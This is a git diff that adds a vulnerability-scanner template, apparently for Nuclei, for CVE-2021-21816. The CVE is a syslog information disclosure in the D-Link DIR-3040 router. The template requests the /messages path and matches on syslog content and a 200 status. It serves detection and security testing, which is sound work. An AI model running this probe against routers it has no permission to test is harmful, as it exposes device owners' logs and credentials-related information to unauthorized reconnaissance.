diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml
new file mode 100644
index 0000000000..e8df776430
--- /dev/null
+++ b/cves/2021/CVE-2021-21816.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-21816
+
+info:
+  name: D-LINK DIR-3040 - Syslog Information Disclosure
+  description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
+  author: gy741
+  severity: medium
+  reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
+  tags: cve,cve2021,dlink,exposure,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/messages"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "syslog:"
+          - "admin"
+          - "/etc_ro/lighttpd/www"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200